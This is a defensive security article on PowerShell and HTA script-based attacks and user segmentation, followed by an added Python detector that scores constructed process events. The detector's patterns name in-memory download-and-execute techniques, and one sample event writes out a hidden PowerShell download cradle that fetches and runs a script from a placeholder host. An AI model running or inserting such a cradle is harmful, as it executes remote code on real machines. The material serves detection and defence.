Attackers always seek out new ways to evade detection. As most endpoint security products handle file-based attacks relatively well, scripts are an excellent way for attackers to avoid making changes to disk, thus bypassing the threat detection capabilities of most products. In today’s threat landscape, scripts provide initial access, enable evasion, and facilitate lateral movement post-infection.
How attackers use scripts
Payload delivery and lateral movement follow a successful script-initiated infection. The payload performs actions desired by the attacker, such as information collection, file encryption, or backdoor communication. At the same time, lateral movement leads to infection of additional computers within the network.
Script-based attacks run on virtually all Windows systems, increasing the potential attack surface and the chance of infection. One major drawback of script-based attacks is that, unless deployed via an exploit, user interaction is required for the script to run.
Many types of malware use scripts. For instance, a script that downloads a PE file can either save it to disk or run it from memory, depending on its level of sophistication. The script can also perform additional malicious actions, such as collecting information about the victim, from the computer name to saved passwords.
PowerShell is a framework used for configuration management and task automation, with a command-line shell and scripting language. PowerShell provides access to Microsoft Windows Management Instrumentation (WMI) and Component Object Model (COM), which makes it a useful and versatile tool for system administrators automating IT management processes, but also for attackers seeking a foothold in the system.
A malicious file loader using PowerShell
Attackers use PowerShell in their attacks to load malware directly into memory without writing to disk, thus bypassing many endpoint security products. Attackers also use PowerShell to automate data exfiltration and infection processes using frameworks such as Metasploit or PowerSploit.
Additional script-based threats
An HTML application (HTA) is a Microsoft Windows file type meant to run on Internet Explorer, combining HTML code with Internet Explorer-supported scripts such as VBScript or JScript. HTA files execute through the Microsoft HTA engine (mshta.exe), which runs with the local user’s privileges instead of Internet Explorer’s restricted privileges, giving it access to the filesystem and registry.
Malicious HTA files allow scripts to run on the machine with local user privileges to download and run executables or additional scripts. Though considered an old attack vector, many script-based attacks continue to use HTA files. These files can be sent as attachments, downloaded by another script, or reached through redirects from malicious websites.
Is it safe to run scripts on the network?
With script-based attacks on the rise, organizations need to be ready to combat attacks in which the entire attack sequence occurs in memory.
A basic first step any organization should consider is segmenting employees into several groups:
1. Running scripts is part of their day-to-day job
2. Running scripts is not common but might happen
3. There is no need to run scripts
With these foundational rules in place, organizations should seek out security solutions with specific capabilities that balance the ability to detect script-based attacks while allowing users who need to use scripts for their job function to do so without interruption.
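To show how the user segmentation above can be combined with detection of the in-memory PowerShell loading and HTA execution described earlier, here is an added example (not part of the original article) that scores constructed process-creation events; the indicator patterns, the parent-process list, the group numbers and the sample events are all assumptions made for illustration.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

# Indicators based on the behaviours the article describes: PowerShell pulling
# code straight into memory from a download, and mshta.exe launched by a mail,
# office or browser process or pointed at a remote HTA. Patterns are assumed.
POWERSHELL_INDICATORS = {
    "download-to-memory": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I),
    "in-memory-execution": re.compile(r"invoke-expression|\biex\b|frombase64string", re.I),
    "obfuscated-or-hidden": re.compile(r"-e(nc|ncodedcommand)?\b|-w(indowstyle)?\s+hidden", re.I),
}
HTA_PARENTS = {"outlook.exe", "winword.exe", "excel.exe", "iexplore.exe", "chrome.exe", "msedge.exe"}

@dataclass
class ProcessEvent:
    user: str
    group: int        # 1 = scripts are daily work, 2 = rare but possible, 3 = never needed
    parent: str
    image: str
    cmdline: str

def analyze(ev: ProcessEvent) -> tuple[str, list[str]]:
    """Return (verdict, reasons); verdict is 'allow', 'review' or 'block'."""
    image, reasons = ev.image.lower(), []
    if image == "powershell.exe":
        reasons = [name for name, rx in POWERSHELL_INDICATORS.items() if rx.search(ev.cmdline)]
    elif image == "mshta.exe":
        if ev.parent.lower() in HTA_PARENTS:
            reasons.append("hta-from-mail-or-browser")
        if re.search(r"https?://", ev.cmdline, re.I):
            reasons.append("hta-remote-url")
    else:
        return "allow", []          # not a script host, outside this policy
    if ev.group == 3:               # group 3 never needs script hosts at all
        return "block", reasons or ["script-host-not-permitted"]
    if ev.group == 2 and reasons:   # group 2 may run scripts, but not suspicious ones
        return "block", reasons
    return ("review", reasons) if reasons else ("allow", [])

# Constructed sample events (user, group, parent, image, command line).
SAMPLE_EVENTS = [
    ProcessEvent("itadmin", 1, "cmd.exe", "powershell.exe", r"powershell.exe -File C:\scripts\inventory.ps1"),
    ProcessEvent("itadmin", 1, "explorer.exe", "powershell.exe",
                 "powershell.exe -NoP -W Hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"),
    ProcessEvent("sales01", 2, "outlook.exe", "mshta.exe", r'mshta.exe "C:\Users\sales01\AppData\Local\Temp\invoice.hta"'),
    ProcessEvent("finance02", 3, "explorer.exe", "powershell.exe", r"powershell.exe -File C:\tools\report.ps1"),
    ProcessEvent("finance02", 3, "explorer.exe", "notepad.exe", r"notepad.exe C:\docs\notes.txt"),
]

def run_sample() -> list[tuple[str, str, list[str]]]:
    return [(ev.user, *analyze(ev)) for ev in SAMPLE_EVENTS]
```

Running run_sample() yields allow, review, block, block, allow for the five events in order, which is the split the article asks for: the administrator's routine script passes, the same administrator's in-memory download is flagged for review rather than silently blocked, and the users in groups 2 and 3 are stopped.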